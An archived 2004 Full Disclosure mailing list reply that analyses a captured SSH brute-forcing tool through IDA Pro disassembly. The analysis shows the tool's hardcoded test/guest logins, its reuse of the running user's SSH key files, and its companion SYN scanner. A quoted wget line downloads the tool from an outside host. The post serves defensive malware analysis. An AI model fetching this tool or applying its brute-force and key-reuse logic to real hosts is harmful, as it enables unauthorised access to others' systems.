Full Disclosure mailing list archives
Re: Automated SSH login attempts?
From: Jan Muenther <jan.muenther () nruns com>
Date: Sat, 31 Jul 2004 20:36:39 +0200
Hi there,
Agreed. The thing *is* publicly available, just do 'wget frauder.us/linux/ssh.tgz'. What kept me from disassembling the thing so far is not availability, but lacking knowledge about the ssh protocol on my side ;-)
Hm, actually, there's fairly little of that required to see what this beast does... Guys, I can't help but sing the praise of IDA Pro. Get it, it's worth the money.
The tool itself dos not need root rights. What needs to be root is the portscanner accompanying it.
Yeah, found that too. That, however, is not surprising. It's a SYN-Scanner, using a detached scanning method, built on libnet (eh, too lazy for raw sockets, are we) and libpcap, and its statically linked against it. Both binaries were not stripped by the way :> You'll need root rights for constructing packets with libnet and root rights to set the interface into promiscuous mode for the pcap captures.
hehe. According to a brief look at the strace of this thingy, it does not do anything suspicious on the local box. But maybe I should have a second look - who knows?
Mkay, it really appears to be just an SSH scanner / bruteforcer, which next to the hardcoded username / password combinations also tries the identity / public key files of the current user to access other boxes. Some stuff from the disassembly (label names are mine, function names are from the binary, as I said, not stripped). So, it first tries to open uniq.txt for its input, nothing new, and bails out if it can't: .text:080482E3 push offset aR ; "r" .text:080482E8 push offset aUniq_txt ; "uniq.txt" .text:080482ED call fopen .text:080482F2 add esp, 10h .text:080482F5 mov [ebp+var_C], eax .text:080482F8 cmp [ebp+var_C], 0 .text:080482FC jnz short loc_8048314 .text:080482FE sub esp, 0Ch .text:08048301 push offset aNuPotDeschideU ; "nu pot deschide uniq.txt\n" .text:08048306 call printf Is this romanian? Seen it a lot recently... .text:0804835B do_it: ; CODE XREF: main+86^Xj .text:0804835B call fork .text:08048360 test eax, eax .text:08048362 jnz short loc_80483A6 .text:08048364 sub esp, 4 .text:08048367 lea eax, [ebp+var_418] .text:0804836D push eax .text:0804836E push offset aTest ; "test" .text:08048373 push offset aTest ; "test" .text:08048378 call ccheckauth .text:0804837D add esp, 10h .text:08048380 sub esp, 4 .text:08048383 lea eax, [ebp+var_418] .text:08048389 push eax .text:0804838A push offset aGuest ; "guest" .text:0804838F push offset aGuest ; "guest" .text:08048394 call ccheckauth .text:08048399 add esp, 10h .text:0804839C sub esp, 0Ch .text:0804839F push 0 .text:080483A1 call exit Mkay, so, it forks and calls a function called ccheckauth(), giving test and guest as parameters for the username and password variables of that function. Once that's done, it exits. So, here's that function: text:080481E8 public ccheckauth .text:080481E8 ccheckauth proc near ; CODE XREF: main+AB^Yp .text:080481E8 ; main+C7^Yp .text:080481E8 .text:080481E8 var_14 = dword ptr -14h .text:080481E8 var_10 = dword ptr -10h .text:080481E8 var_C = dword ptr -0Ch .text:080481E8 var_8 = dword ptr -8 .text:080481E8 var_4 = dword ptr -4 .text:080481E8 arg_0 = dword ptr 8 .text:080481E8 arg_4 = dword ptr 0Ch .text:080481E8 arg_8 = dword ptr 10h .text:080481E8 .text:080481E8 push ebp .text:080481E9 mov ebp, esp .text:080481EB sub esp, 18h .text:080481EE mov [ebp+var_C], 1 .text:080481F5 mov [ebp+var_10], offset aNone ; "none" .text:080481FC sub esp, 0Ch .text:080481FF push 0Fh .text:08048201 call alarm .text:08048206 add esp, 10h .text:08048209 sub esp, 8 .text:08048206 add esp, 10h .text:08048209 sub esp, 8 .text:0804820C lea eax, [ebp+var_10] .text:0804820F push eax .text:08048210 lea eax, [ebp+var_C] .text:08048213 push eax .text:08048214 call ssh_getopt .text:08048219 add esp, 10h .text:0804821C mov [ebp+var_8], eax .text:0804821F sub esp, 8 .text:08048222 push [ebp+arg_0] .text:08048225 push [ebp+var_8] .text:08048228 call options_set_username .text:0804822D add esp, 10h .text:08048230 sub esp, 8 .text:08048233 push [ebp+arg_8] .text:08048236 push [ebp+var_8] .text:08048239 call options_set_host .text:0804823E add esp, 10h .text:08048241 sub esp, 0Ch .text:08048244 push [ebp+var_8] .text:08048247 call ssh_connect .text:0804824C add esp, 10h .text:0804824F mov [ebp+var_4], eax .text:0804824C add esp, 10h .text:0804824F mov [ebp+var_4], eax .text:08048252 cmp [ebp+var_4], 0 .text:08048256 jnz short loc_804825A .text:08048258 jmp short locret_80482CB .text:0804825A ; --------------------------------------------------------------- ------------ It basically calls a bunch of other functions which do the entire session setup stuff for the SSH connection attempts. These functions do exactly what their names imply, so I save the disassemblies here for brevity's sake. So, there's nothing spectacular here, it's a SSH bruteforcer. One thing though, it also uses key auth (determines the current user's home dir and looks for publickey and id files): .text:08048B90 trykey: ; CODE XREF: ssh_userauth _autopubkey+F6^Yj .text:08048B90 sub esp, 8 .text:08048B93 lea eax, [ebp+var_10] .text:08048B96 push eax .text:08048B97 lea eax, [ebp+var_14] .text:08048B9A push eax .text:08048B9B lea eax, [ebp+var_18] .text:08048B9E push eax .text:08048B9F push offset keys_path .text:08048BA4 push offset pub_keys_path .text:08048BA9 push edi .text:08048BAA call publickey_from_next_file .text:08048BAF add esp, 20h .text:08048BB2 test eax, eax .text:08048BAF add esp, 20h .text:08048BB2 test eax, eax .text:08048BB4 mov ebx, eax .text:08048BB6 jz nokeymatch .text:08048BBC push ebx .text:08048BBD mov eax, [ebp+var_14] .text:08048BC0 push eax .text:08048BC1 push 0 .text:08048BC3 push edi .text:08048BC4 call ssh_userauth_offer_pubkey .text:08048BC9 add esp, 10h .text:08048BCC cmp eax, 0FFFFFFFFh .text:08048BCF jz cleanupkey .text:08048BD5 test eax, eax .text:08048BD7 jnz pubrefused .text:08048BDD push 0 .text:08048BDF mov eax, [ebp+var_14] .text:08048BE2 push eax .text:08048BE3 mov eax, [ebp+var_18] .text:08048BE6 push eax .text:08048BE7 push edi .text:08048BE8 call privatekey_from_file .text:08048BED add esp, 10h .text:08048BF0 test eax, eax .text:08048BED add esp, 10h .text:08048BF0 test eax, eax .text:08048BF2 mov esi, eax .text:08048BF4 jz readprivfail .text:08048BFA push eax .text:08048BFB push ebx .text:08048BFC push 0 .text:08048BFE push edi .text:08048BFF call ssh_userauth_pubkey .text:08048C04 add esp, 10h .text:08048C07 cmp eax, 0FFFFFFFFh .text:08048C0A jz loc_8048CAA .text:08048C10 test eax, eax .text:08048C12 jz short auth_success .text:08048C14 sub esp, 8 .text:08048C17 push offset aWeirdServerAcc ; "Weird : server accepted our public key "... .text:08048C1C push 0 .text:08048C1E call ssh_say .text:08048C23 mov [esp+38h+var_38], ebx .text:08048C26 call free .text:08048C2B mov [esp+38h+var_38], esi .text:08048C2E call private_key_free So, yeah, it's a bruteforcer, nothing magic here.
Right. And somebody volunteered for this job right now, did you? ;-)
Eh. Limited time, new girlfriend is here and it's weekend :-/ So forgive the incompleteness of this :> Maybe more on monday. FWIW, if there are other versions out, they might be more interesting than this tool. Cheers, J. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Automated SSH login attempts?, (continued)
- Re: Automated SSH login attempts? Alain Crespo (Jul 28)
- Re: Automated SSH login attempts? syrrus (Jul 25)
- Re: Automated SSH login attempts? Joe Hickory (Jul 27)
- Re: Automated SSH login attempts? Juan Carlos Navea (Jul 29)
- RE: Automated SSH login attempts? Todd Towles (Jul 29)
- Re: Automated SSH login attempts? Ali Campbell (Jul 29)
- Re: Automated SSH login attempts? Andrew Farmer (Jul 29)
- Re: Automated SSH login attempts? Jan Muenther (Jul 30)
- RE: Automated SSH login attempts? Todd Towles (Jul 30)
- Re: Automated SSH login attempts? Stefan Janecek (Jul 30)
- Re: Automated SSH login attempts? Jan Muenther (Jul 31)
- Re: Automated SSH login attempts? Andrew Farmer (Jul 30)
- Re: Automated SSH login attempts? Christian Fromme (Jul 30)
- Re: Re: Automated SSH login attempts? Valdis . Kletnieks (Jul 29)
- Re: Re: Automated SSH login attempts? Jan Muenther (Jul 30)
- Re: Re: Automated SSH login attempts? Andrei Galca-Vasiliu (Jul 29)
- Re: Re: Automated SSH login attempts? Max Valdez (Jul 29)
- Re: Re: Automated SSH login attempts? dmargoli (Jul 29)
- Re: Re: Automated SSH login attempts? Ron DuFresne (Jul 29)
- Re: Re: Automated SSH login attempts? joe smith (Jul 29)